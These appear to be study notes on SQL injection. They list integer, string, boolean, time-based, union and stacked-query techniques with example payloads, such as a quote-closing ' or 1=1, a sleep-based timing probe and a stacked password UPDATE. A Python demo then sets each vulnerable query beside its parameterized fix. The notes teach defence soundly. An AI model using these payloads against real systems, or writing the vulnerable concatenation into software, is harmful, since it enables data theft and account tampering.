Integer-based injection:
URL: http://localhost/?id=12
Concatenated SQL: $sql = "select * from user where id = {$_GET['id']}";
Executed SQL: select * from user where id = 12
In integer-based SQL injection the vulnerable URL parameter is of integer type, so the parameter value is not surrounded by quotes in the SQL statement.
String-based injection:
URL: http://localhost/?name=jackWan
Concatenated SQL: $sql = "select * from user where name = '{$_GET['name']}'";
Executed SQL: select * from user where name = 'jackWan'
Here the parameter value is surrounded by quotes in the SQL statement, so the attack vector has to close that quote (?name=' or 1=1).
Boolean-based injection:
length() returns the storage length of a string (in bytes); char_length() returns the number of characters.
left(str, len) and right(str, len) return the leftmost (rightmost) len characters of str.
database() returns the name of the current database.
To test whether the first two characters of the current database name are greater than 'na' (comparing ASCII codes): select * from user where id = 1 and left(database(),2) > 'na';
Time-based injection:
if(condition, A, B) returns A when condition is true, otherwise B.
To sleep for 10 seconds if the current database name is 4 characters long: select * from user where id = 1 and if(char_length(database())=4,sleep(10),1)
Error-based injection:
Reference: http://www.cnblogs.com/natian-ws/p/7204806.html
Union-query injection:
select * from user where id = 1 union select * from user_info
Stacked-query (multi-statement) injection:
select * from user where id = 1; update user set password = '123456' where id = 1
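The following is an added example, not code from the original notes. It reproduces the two concatenation patterns from the integer-based and string-based sections above and the stacked query from this section against an in-memory SQLite database (so MySQL-only functions such as database() and sleep() are not exercised), and places each vulnerable query beside its parameterized fix. The user table, its three rows and the password values are constructed for the example; the attack strings are the ones the notes already describe, written in balanced form so that the statement stays syntactically valid.

```python
import sqlite3

# Constructed test data: a small user table standing in for the notes' "user" table.
ROWS = [
    (1, "admin", "secret-1"),
    (2, "alice", "secret-2"),
    (12, "jackWan", "secret-12"),
]

# The stacked query quoted in the notes, verbatim.
STACKED_QUERY = (
    "select * from user where id = 1; "
    "update user set password = '123456' where id = 1"
)


def make_db():
    """Build the in-memory database used by every function below."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user (id integer primary key, name text, password text)")
    conn.executemany("insert into user values (?, ?, ?)", ROWS)
    return conn


# --- Integer-based: no quotes around the value, so any trailing SQL is executed as SQL.
def vulnerable_by_id(conn, id_param):
    sql = f"select * from user where id = {id_param}"      # same shape as the notes' PHP
    return conn.execute(sql).fetchall()


def safe_by_id(conn, id_param):
    """Fix: enforce the integer type before the value reaches SQL, then bind it."""
    try:
        id_value = int(id_param)
    except (TypeError, ValueError):
        return []                                           # reject anything that is not an integer
    return conn.execute("select * from user where id = ?", (id_value,)).fetchall()


# --- String-based: the value sits inside quotes, so the input must close them first.
def vulnerable_by_name(conn, name_param):
    sql = f"select * from user where name = '{name_param}'"
    return conn.execute(sql).fetchall()


def safe_by_name(conn, name_param):
    """Fix: a bound parameter is sent as data, so quotes in it never reach the parser."""
    return conn.execute("select * from user where name = ?", (name_param,)).fetchall()


# --- Stacked queries: whether the second statement runs depends on the driver API.
def run_single_statement_api(conn, sql):
    """cursor.execute() accepts exactly one statement; a stacked query is rejected
    before anything runs (sqlite3 raises Warning or ProgrammingError depending on version)."""
    try:
        conn.execute(sql).fetchall()
        return "executed"
    except (sqlite3.Warning, sqlite3.Error):
        return "rejected"


def run_multi_statement_api(conn, sql):
    """executescript() deliberately runs several statements, so the same input
    reaches the UPDATE. This is why user input must never feed a multi-statement API."""
    conn.executescript(sql)
    return "executed"


def password_of(conn, user_id):
    row = conn.execute("select password from user where id = ?", (user_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable id  :", len(vulnerable_by_id(conn, "12 or 1=1")), "rows")   # every row
    print("safe id        :", len(safe_by_id(conn, "12 or 1=1")), "rows")         # rejected
    print("vulnerable name:", len(vulnerable_by_name(conn, "' or '1'='1")), "rows")
    print("safe name      :", len(safe_by_name(conn, "' or '1'='1")), "rows")
    print("stacked/execute:", run_single_statement_api(conn, STACKED_QUERY), password_of(conn, 1))
    print("stacked/script :", run_multi_statement_api(conn, STACKED_QUERY), password_of(conn, 1))
```

The integer fix relies on type enforcement rather than quoting because, as the notes point out, there is no quote to escape in that position; the string fix relies on parameter binding. Both fixes also remove the stacked-query case, but the last two functions show that the driver API matters on its own: an API that executes one statement per call refuses the second statement, while a multi-statement API (executescript here; mysqli's multi_query in PHP is the analogous call) carries out the UPDATE.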